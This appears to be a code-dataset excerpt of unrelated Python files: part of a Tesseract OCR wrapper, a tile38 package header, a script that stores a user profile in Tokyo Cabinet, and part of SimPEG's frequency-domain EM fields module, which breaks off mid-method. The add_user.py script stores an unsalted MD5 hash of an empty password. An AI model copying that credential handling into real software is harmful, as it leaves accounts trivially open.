                    dirs.append(join(environ['PROGRAMFILES(X86)'], PyTessy.TESSERACT_DIRNAME))
                # Renamed from `dir`/`test` to avoid shadowing builtins.
                for candidate_dir in dirs:
                    candidate = join(candidate_dir, '{}.dll'.format(lib_name))
                    if isfile(candidate):
                        lib_path = candidate
                        verbose(' {} SUCCESS.'.format(candidate))
                        break
                    else:
                        verbose(' {} FAILED.'.format(candidate))
                if lib_path is None:
                    raise FileNotFoundError('Cannot locate Tesseract-OCR library.')
            elif platform.startswith('linux'):
                raise NotImplementedError('PyTessy: Library search on Linux is not implemented yet.')
            elif platform.startswith('darwin'):
                raise NotImplementedError('PyTessy: Library search on MacOS is not implemented yet.')
            else:
                raise NotImplementedError('PyTessy: Library search on this system is not implemented.')
        tess_path = dirname(abspath(lib_path))
        no_tessdata = True
        if data_path is not None:
            if isdir(data_path):
                no_tessdata = False
        if no_tessdata:
            # Look for a "tessdata" directory next to the script, inside a
            # bundled Tesseract-OCR directory, or next to the library itself.
            for test_path in [run_path, join(run_path, PyTessy.TESSERACT_DIRNAME), tess_path]:
                test_path = join(test_path, PyTessy.TESSDATA_DIRNAME)
                if isdir(test_path):
                    data_path = test_path
                    break
            if data_path is None:
                raise FileNotFoundError('PyTessy: Couldn\'t find "tessdata" directory.')
        self._tess = TesseractHandler(lib_path=lib_path, data_path=data_path,
                                      language=language)
        # Fixed: on Python 3 bytes(int) builds that many NUL bytes, so
        # bytes(psm) sent b'\x00' * psm instead of e.g. b'7'; encode the
        # decimal string so Tesseract receives the intended value.
        self._tess.set_variable(b"tessedit_pageseg_mode", str(psm).encode('ascii'))
        self._tess.set_variable(b"tessedit_ocr_engine_mode", str(oem).encode('ascii'))
        if char_whitelist:
            self._tess.set_variable(b"tessedit_char_whitelist", char_whitelist)

    def justread(self, raw_image_ctypes, width, height, bytes_per_pixel,
                 bytes_per_line, resolution=96):
        """
        Reads text as utf-8 string from raw image data without any check
        ----------------------------------------------------------------
        @Params: raw_image_ctypes (ctypes int array) Raw image data.
                 width            (int)              Image width.
                 height           (int)              Image height.
                 bytes_per_pixel  (int)              Number of bytes per pixel.
                 bytes_per_line   (int)              Number of bytes per line.
                 resolution       (int)              [optional] Resolution in
                                                     dpi. Default: 96.
        @Return: (string) Text read by Tesseract-OCR as utf-8 string.
        """
        self._tess.set_image(raw_image_ctypes, width, height, bytes_per_pixel,
                             bytes_per_line, resolution)
        return self._tess.get_text()

    def justread_raw(self, raw_image_ctypes, width, height, bytes_per_pixel,
                     bytes_per_line, resolution=96):
        """
        Reads text as raw bytes data from raw image data without any check
        ------------------------------------------------------------------
        @Params: raw_image_ctypes (ctypes int array) Raw image data.
                 width            (int)              Image width.
                 height           (int)              Image height.
                 bytes_per_pixel  (int)              Number of bytes per pixel.
                 bytes_per_line   (int)              Number of bytes per line.
                 resolution       (int)              [optional] Resolution in
                                                     dpi. Default: 96.
        @Return: (bytes) Text read by Tesseract-OCR as raw bytes data.
        """
        self._tess.set_image(raw_image_ctypes, width, height, bytes_per_pixel,
                             bytes_per_line, resolution)
        # Fixed: previously returned get_text() (utf-8 decoded string),
        # contradicting the documented bytes contract of the raw variant.
        return self._tess.get_text_raw()

    def read(self, imagedata, width, height, bytes_per_pixel, resolution=96,
             raw=False):
        """
        Reads text from image data
        --------------------------
        @Params: imagedata       (ctypes int array) Raw image data.
                 width           (int)              Image width.
                 height          (int)              Image height.
                 bytes_per_pixel (int)              Number of bytes per pixel.
                 resolution      (int)              [optional] Resolution in
                                                    dpi. Default: 96.
                 raw             (boolean)          [optional] Whether to read
                                                    in raw or utf-8 mode.
        @Return: (bytes) or (string) Text read by Tesseract-OCR
        """
        # Rows are assumed tightly packed (no per-line padding/stride).
        bytes_per_line = width * bytes_per_pixel
        if raw:
            return self.justread_raw(imagedata, width, height, bytes_per_pixel,
                                     bytes_per_line, resolution)
        return self.justread(imagedata, width, height, bytes_per_pixel,
                             bytes_per_line, resolution)
# Importing this file is the supported use; running it directly does nothing
# useful, so just say so.
if __name__ == '__main__':
    print('This is a module not a script.')
| 40.871122 | 103 | 0.494307 |
80e63538ce1e26fe44561622d70e2d7d02bb1455 | 206 | py | Python | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | # !/user/bin/env/python
# -*- coding: utf-8 -*-
# version: v0.0.1
# author: youth
# contact: tuwenyoung@gmail.com
# project: tile38_py
# filename: __init__.py.py
# datetime: 2017-01-13 22:20
# description: | 22.888889 | 31 | 0.679612 |
719944bfa7bc74c200af87841562ae58ab7e9ee3 | 330 | py | Python | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | 1 | 2020-04-14T13:28:38.000Z | 2020-04-14T13:28:38.000Z | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | null | null | null | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import pytc
import hashlib
import pickle
# Path to the Tokyo Cabinet hash database, relative to the bin/ directory.
DBNAME="../mental_cache.hdb"

db = pytc.HDB()
# Open writable, creating the database file if it does not exist yet.
db.open(DBNAME, pytc.HDBOWRITER | pytc.HDBOCREAT)

# NOTE(review): hashlib.md5("") stores the MD5 of an *empty* password —
# MD5 is unsuitable for passwords and the credential is blank; also the str
# argument (and the commented print below) implies this is Python 2 code.
profile = {
'pw':hashlib.md5("").hexdigest(),
'id':'ff5634',
'name': 'Ryan Detzel'
}
# Serialize the profile with pickle and store it under the username key.
db.put('ryan',pickle.dumps(profile))
#print pickle.loads(db.get('ryan'))
| 16.5 | 49 | 0.660606 |
8167d1f530ebf0ada04fcd6b33c9ad193d3a541c | 56,228 | py | Python | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 358 | 2015-03-11T05:48:41.000Z | 2022-03-26T02:04:12.000Z | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 885 | 2015-01-19T09:23:48.000Z | 2022-03-29T12:08:34.000Z | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 214 | 2015-03-11T05:48:43.000Z | 2022-03-02T01:05:11.000Z | import numpy as np
import scipy.sparse as sp
from ...fields import Fields
from ...utils import mkvc, Zero, Identity, sdiag
from ..utils import omega
from ...utils.code_utils import deprecate_class
class FieldsFDEM(Fields):
    """
    Fancy Field Storage for a FDEM survey. Only one field type is stored for
    each problem, the rest are computed. The fields object acts like an array
    and is indexed by

    .. code-block:: python

        f = problem.fields(m)
        e = f[source_list,'e']
        b = f[source_list,'b']

    If accessing all sources for a given field, use the :code:`:`

    .. code-block:: python

        f = problem.fields(m)
        e = f[:,'e']
        b = f[:,'b']

    The array returned will be size (nE or nF, nSrcs :math:`\\times`
    nFrequencies)
    """

    # Subclasses declare which field is actually solved for; all others are
    # derived through the aliasFields machinery of the Fields base class.
    knownFields = {}
    # Frequency-domain fields are complex-valued.
    dtype = complex
def _GLoc(self, fieldType):
"""Grid location of the fieldType"""
return self.aliasFields[fieldType][1]
def _e(self, solution, source_list):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
if (
getattr(self, "_ePrimary", None) is None
or getattr(self, "_eSecondary", None) is None
):
raise NotImplementedError(
"Getting e from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._ePrimary(solution, source_list) + self._eSecondary(
solution, source_list
)
def _b(self, solution, source_list):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
if (
getattr(self, "_bPrimary", None) is None
or getattr(self, "_bSecondary", None) is None
):
raise NotImplementedError(
"Getting b from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._bPrimary(solution, source_list) + self._bSecondary(
solution, source_list
)
def _bSecondary(self, solution, source_list):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
if getattr(self, "_bSecondary", None) is None:
raise NotImplementedError(
"Getting b from {} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._bSecondary(solution, source_list)
def _h(self, solution, source_list):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
if (
getattr(self, "_hPrimary", None) is None
or getattr(self, "_hSecondary", None) is None
):
raise NotImplementedError(
"Getting h from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._hPrimary(solution, source_list) + self._hSecondary(
solution, source_list
)
def _j(self, solution, source_list):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
if (
getattr(self, "_jPrimary", None) is None
or getattr(self, "_jSecondary", None) is None
):
raise NotImplementedError(
"Getting j from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._jPrimary(solution, source_list) + self._jSecondary(
solution, source_list
)
def _eDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of e with respect to the inversion model. Returns
:math:`d\mathbf{e}/d\mathbf{m}` for forward and
(:math:`d\mathbf{e}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`)
for the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_eDeriv_u", None) is None
or getattr(self, "_eDeriv_m", None) is None
):
raise NotImplementedError(
"Getting eDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._eDeriv_u(src, v, adjoint), self._eDeriv_m(src, v, adjoint))
return np.array(
self._eDeriv_u(src, du_dm_v, adjoint) + self._eDeriv_m(src, v, adjoint),
dtype=complex,
)
def _bDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of b with respect to the inversion model. Returns
:math:`d\mathbf{b}/d\mathbf{m}` for forward and
(:math:`d\mathbf{b}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_bDeriv_u", None) is None
or getattr(self, "_bDeriv_m", None) is None
):
raise NotImplementedError(
"Getting bDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._bDeriv_u(src, v, adjoint), self._bDeriv_m(src, v, adjoint))
return np.array(
self._bDeriv_u(src, du_dm_v, adjoint) + self._bDeriv_m(src, v, adjoint),
dtype=complex,
)
def _bSecondaryDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of b with respect to the inversion model. Returns
:math:`d\mathbf{b}/d\mathbf{m}` for forward and
(:math:`d\mathbf{b}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: sorce
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
# TODO: modify when primary field is dependent on m
return self._bDeriv(src, du_dm_v, v, adjoint=adjoint)
def _hDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of h with respect to the inversion model. Returns
:math:`d\mathbf{h}/d\mathbf{m}` for forward and
(:math:`d\mathbf{h}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`)
for the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_hDeriv_u", None) is None
or getattr(self, "_hDeriv_m", None) is None
):
raise NotImplementedError(
"Getting hDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._hDeriv_u(src, v, adjoint), self._hDeriv_m(src, v, adjoint))
return np.array(
self._hDeriv_u(src, du_dm_v, adjoint) + self._hDeriv_m(src, v, adjoint),
dtype=complex,
)
def _jDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of j with respect to the inversion model. Returns
:math:`d\mathbf{j}/d\mathbf{m}` for forward and
(:math:`d\mathbf{j}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_jDeriv_u", None) is None
or getattr(self, "_jDeriv_m", None) is None
):
raise NotImplementedError(
"Getting jDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._jDeriv_u(src, v, adjoint), self._jDeriv_m(src, v, adjoint))
return np.array(
self._jDeriv_u(src, du_dm_v, adjoint) + self._jDeriv_m(src, v, adjoint),
dtype=complex,
)
class Fields3DElectricField(FieldsFDEM):
    """
    Fields object for Simulation3DElectricField.

    The electric field is solved for on mesh edges; all other fields are
    derived from it through the ``aliasFields`` mechanism.

    :param discretize.base.BaseMesh mesh: mesh
    :param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
    """
    # solution field name -> grid location ("E" = edges)
    knownFields = {"eSolution": "E"}
    # alias name -> [solution name, grid location, method used to compute it]
    aliasFields = {
        "e": ["eSolution", "E", "_e"],
        "ePrimary": ["eSolution", "E", "_ePrimary"],
        "eSecondary": ["eSolution", "E", "_eSecondary"],
        "b": ["eSolution", "F", "_b"],
        "bPrimary": ["eSolution", "F", "_bPrimary"],
        "bSecondary": ["eSolution", "F", "_bSecondary"],
        "j": ["eSolution", "E", "_j"],
        "h": ["eSolution", "F", "_h"],
    }
    def startup(self):
        # Cache mesh operators and simulation mass matrices once so the
        # field/derivative methods below avoid repeated property lookups.
        self._edgeCurl = self.simulation.mesh.edgeCurl
        self._aveE2CCV = self.simulation.mesh.aveE2CCV
        self._aveF2CCV = self.simulation.mesh.aveF2CCV
        self._nC = self.simulation.mesh.nC
        self._MeSigma = self.simulation.MeSigma
        self._MeSigmaDeriv = self.simulation.MeSigmaDeriv
        self._MfMui = self.simulation.MfMui
        self._MfMuiDeriv = self.simulation.MfMuiDeriv
        self._MeI = self.simulation.MeI
        self._MfI = self.simulation.MfI
    def _GLoc(self, fieldType):
        # Grid location of each field type: edges for e/j, faces for b/h.
        if fieldType in ["e", "eSecondary", "ePrimary", "j"]:
            return "E"
        elif fieldType in ["b", "bSecondary", "bPrimary", "h"]:
            return "F"
        else:
            raise Exception("Field type must be e, b, h, j")
    def _ePrimary(self, eSolution, source_list):
        """
        Primary electric field from source

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary electric field as defined by the sources
        """
        # one column per source; accumulate each source's primary field
        ePrimary = np.zeros([self.simulation.mesh.nE, len(source_list)], dtype=complex)
        for i, src in enumerate(source_list):
            ep = src.ePrimary(self.simulation)
            ePrimary[:, i] = ePrimary[:, i] + ep
        return ePrimary
    def _eSecondary(self, eSolution, source_list):
        """
        Secondary electric field is the thing we solved for

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary electric field
        """
        return eSolution
    def _eDeriv_u(self, src, v, adjoint=False):
        """
        Partial derivative of the total electric field with respect to the
        thing we solved for.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the electric field with respect
            to the field we solved for with a vector
        """
        # e is the solution itself, so the derivative is the identity
        return Identity() * v
    def _eDeriv_m(self, src, v, adjoint=False):
        """
        Partial derivative of the total electric field with respect to the
        inversion model. Here, we assume that the primary does not depend on
        the model. Note that this also includes derivative contributions from
        the sources.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: SimPEG.utils.Zero
        :return: product of the electric field derivative with respect to the
            inversion model with a vector
        """
        return src.ePrimaryDeriv(self.simulation, v, adjoint)
    def _bPrimary(self, eSolution, source_list):
        """
        Primary magnetic flux density from source

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary magnetic flux density as defined by the sources
        """
        bPrimary = np.zeros(
            [self._edgeCurl.shape[0], eSolution.shape[1]], dtype=complex
        )
        for i, src in enumerate(source_list):
            bp = src.bPrimary(self.simulation)
            bPrimary[:, i] = bPrimary[:, i] + bp
        return bPrimary
    def _bSecondary(self, eSolution, source_list):
        """
        Secondary magnetic flux density from eSolution

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary magnetic flux density
        """
        # b = (s_m - C*e) / (i*omega): rearranged frequency-domain
        # Faraday's law, applied per source column below.
        C = self._edgeCurl
        b = C * eSolution
        for i, src in enumerate(source_list):
            b[:, i] *= -1.0 / (1j * omega(src.frequency))  # freq depends on the source
            s_m = src.s_m(self.simulation)
            b[:, i] = b[:, i] + 1.0 / (1j * omega(src.frequency)) * s_m
        return b
    def _bDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the magnetic flux density with respect to the thing we
        solved for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic flux density with
            respect to the field we solved for with a vector
        """
        C = self._edgeCurl
        if adjoint:
            # adjoint uses the transposed curl
            return -1.0 / (1j * omega(src.frequency)) * (C.T * du_dm_v)
        return -1.0 / (1j * omega(src.frequency)) * (C * du_dm_v)
    def _bDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the magnetic flux density with respect to the inversion
        model.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the magnetic flux density derivative with respect
            to the inversion model with a vector
        """
        # only the source terms contribute; delegated to _bDeriv_src
        return self._bDeriv_src(src, v, adjoint=adjoint)
    def _bDeriv_src(self, src, v, adjoint=False):
        # derivative contribution of the source terms (s_m and bPrimary)
        s_mDeriv = src.s_mDeriv(self.simulation, v, adjoint)
        return 1.0 / (1j * omega(src.frequency)) * s_mDeriv + src.bPrimaryDeriv(
            self.simulation, v, adjoint
        )
    def _j(self, eSolution, source_list):
        """
        Current density from eSolution

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: current density
        """
        # Ohm's law on edges: j = MeI * (MeSigma * e)
        return self._MeI * (self._MeSigma * self._e(eSolution, source_list))
    def _jDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the current density with respect to the thing we solved
        for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the current density with respect
            to the field we solved for with a vector
        """
        if adjoint:
            # adjoint applies the transposed matrices in reverse order
            return self._eDeriv_u(
                src, self._MeSigma.T * (self._MeI.T * du_dm_v), adjoint=adjoint
            )
        return self._MeI * (
            self._MeSigma * (self._eDeriv_u(src, du_dm_v, adjoint=adjoint))
        )
    def _jDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the current density with respect to the inversion model.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the current density derivative with respect to the
            inversion model with a vector
        """
        # product rule: d(MeSigma)/dm acting on e, plus MeSigma * de/dm,
        # plus the source's primary-current contribution
        e = self[src, "e"]
        if adjoint:
            return (
                self._MeSigmaDeriv(e, (self._MeI.T * v), adjoint=adjoint)
                + self._eDeriv_m(src, (self._MeI.T * v), adjoint=adjoint)
            ) + src.jPrimaryDeriv(self.simulation, v, adjoint)
        return (
            self._MeI
            * (
                self._eDeriv_m(src, v, adjoint=adjoint)
                + self._MeSigmaDeriv(e, v, adjoint=adjoint)
            )
        ) + src.jPrimaryDeriv(self.simulation, v, adjoint)
    def _h(self, eSolution, source_list):
        """
        Magnetic field from eSolution

        :param numpy.ndarray eSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: magnetic field
        """
        # constitutive relation on faces: h = MfI * (MfMui * b)
        return self._MfI * (self._MfMui * self._b(eSolution, source_list))
    def _hDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the magnetic field with respect to the thing we solved
        for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic field with respect
            to the field we solved for with a vector
        """
        if adjoint:
            v = self._MfMui.T * (self._MfI.T * du_dm_v)
            return self._bDeriv_u(src, v, adjoint=adjoint)
        return self._MfI * (self._MfMui * self._bDeriv_u(src, du_dm_v, adjoint=adjoint))
    def _hDeriv_mui(self, src, v, adjoint=False):
        # derivative of h with respect to the inverse permeability (mui)
        # n = int(self._aveF2CCV.shape[0] / self._nC)  # Number of Components
        # VI = sdiag(np.kron(np.ones(n), 1./self.simulation.mesh.vol))
        if adjoint is True:
            return self._MfMuiDeriv(self[src, "b"], (self._MfI.T * v), adjoint)
        return self._MfI * (self._MfMuiDeriv(self[src, "b"], v))
    def _hDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the magnetic field with respect to the inversion model.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the magnetic field derivative with respect to the
            inversion model with a vector
        """
        # n = int(self._aveF2CCV.shape[0] / self._nC)  # Number of Components
        # VI = sdiag(np.kron(np.ones(n), 1./self.simulation.mesh.vol))
        if adjoint:
            return self._bDeriv_m(
                src, self._MfMui.T * (self._MfI.T * v), adjoint=adjoint
            ) + self._hDeriv_mui(src, v, adjoint=adjoint)
        return (
            self._MfI * (self._MfMui * self._bDeriv_m(src, v, adjoint=adjoint))
        ) + self._hDeriv_mui(src, v, adjoint=adjoint)
class Fields3DMagneticFluxDensity(FieldsFDEM):
    """
    Fields object for Simulation3DMagneticFluxDensity.

    The magnetic flux density is solved for on mesh faces; all other fields
    are derived from it through the ``aliasFields`` mechanism.

    :param discretize.base.BaseMesh mesh: mesh
    :param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
    """
    # solution field name -> grid location ("F" = faces)
    knownFields = {"bSolution": "F"}
    # alias name -> [solution name, grid location, method used to compute it]
    aliasFields = {
        "b": ["bSolution", "F", "_b"],
        "bPrimary": ["bSolution", "F", "_bPrimary"],
        "bSecondary": ["bSolution", "F", "_bSecondary"],
        "e": ["bSolution", "E", "_e"],
        "ePrimary": ["bSolution", "E", "_ePrimary"],
        "eSecondary": ["bSolution", "E", "_eSecondary"],
        "j": ["bSolution", "E", "_j"],
        "h": ["bSolution", "F", "_h"],
    }
    def startup(self):
        # Cache mesh operators and simulation mass matrices once so the
        # field/derivative methods below avoid repeated property lookups.
        self._edgeCurl = self.simulation.mesh.edgeCurl
        self._MeSigma = self.simulation.MeSigma
        self._MeSigmaI = self.simulation.MeSigmaI
        self._MfMui = self.simulation.MfMui
        self._MfMuiDeriv = self.simulation.MfMuiDeriv
        self._MeSigmaDeriv = self.simulation.MeSigmaDeriv
        self._MeSigmaIDeriv = self.simulation.MeSigmaIDeriv
        self._Me = self.simulation.Me
        self._aveF2CCV = self.simulation.mesh.aveF2CCV
        self._aveE2CCV = self.simulation.mesh.aveE2CCV
        self._sigma = self.simulation.sigma
        self._mui = self.simulation.mui
        self._nC = self.simulation.mesh.nC
        self._MeI = self.simulation.MeI
        self._MfI = self.simulation.MfI
    def _GLoc(self, fieldType):
        # Grid location of each field type: edges for e/j, faces for b/h.
        if fieldType in ["e", "eSecondary", "ePrimary", "j"]:
            return "E"
        elif fieldType in ["b", "bSecondary", "bPrimary", "h"]:
            return "F"
        else:
            raise Exception("Field type must be e, b, h, j")
    def _bPrimary(self, bSolution, source_list):
        """
        Primary magnetic flux density from source

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary magnetic flux density as defined by the sources
        """
        # one column per source; accumulate each source's primary field
        bPrimary = np.zeros([self.simulation.mesh.nF, len(source_list)], dtype=complex)
        for i, src in enumerate(source_list):
            bp = src.bPrimary(self.simulation)
            bPrimary[:, i] = bPrimary[:, i] + bp
        return bPrimary
    def _bSecondary(self, bSolution, source_list):
        """
        Secondary magnetic flux density is the thing we solved for

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary magnetic flux density
        """
        return bSolution
    def _bDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Partial derivative of the total magnetic flux density with respect to
        the thing we solved for.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic flux density with
            respect to the field we solved for with a vector
        """
        # b is the solution itself, so the derivative is the identity
        return Identity() * du_dm_v
    def _bDeriv_m(self, src, v, adjoint=False):
        """
        Partial derivative of the total magnetic flux density with respect to
        the inversion model. Here, we assume that the primary does not depend
        on the model. Note that this also includes derivative contributions
        from the sources.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: SimPEG.utils.Zero
        :return: product of the magnetic flux density derivative with respect
            to the inversion model with a vector
        """
        # assuming primary does not depend on the model
        return Zero()
    def _ePrimary(self, bSolution, source_list):
        """
        Primary electric field from source

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary electric field as defined by the sources
        """
        ePrimary = np.zeros(
            [self._edgeCurl.shape[1], bSolution.shape[1]], dtype=complex
        )
        for i, src in enumerate(source_list):
            ep = src.ePrimary(self.simulation)
            ePrimary[:, i] = ePrimary[:, i] + ep
        return ePrimary
    def _eSecondary(self, bSolution, source_list):
        """
        Secondary electric field from bSolution

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary electric field
        """
        # e = MeSigmaI * (C.T * (MfMui * b) - s_e)
        e = self._edgeCurl.T * (self._MfMui * bSolution)
        for i, src in enumerate(source_list):
            s_e = src.s_e(self.simulation)
            e[:, i] = e[:, i] + -s_e
        return self._MeSigmaI * e
    def _eDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the electric field with respect to the thing we solved
        for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the electric field with respect
            to the field we solved for with a vector
        """
        if not adjoint:
            return self._MeSigmaI * (self._edgeCurl.T * (self._MfMui * du_dm_v))
        # adjoint applies the transposed matrices in reverse order
        return self._MfMui.T * (self._edgeCurl * (self._MeSigmaI.T * du_dm_v))
    def _eDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the electric field with respect to the inversion model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the electric field with respect
            to the model with a vector
        """
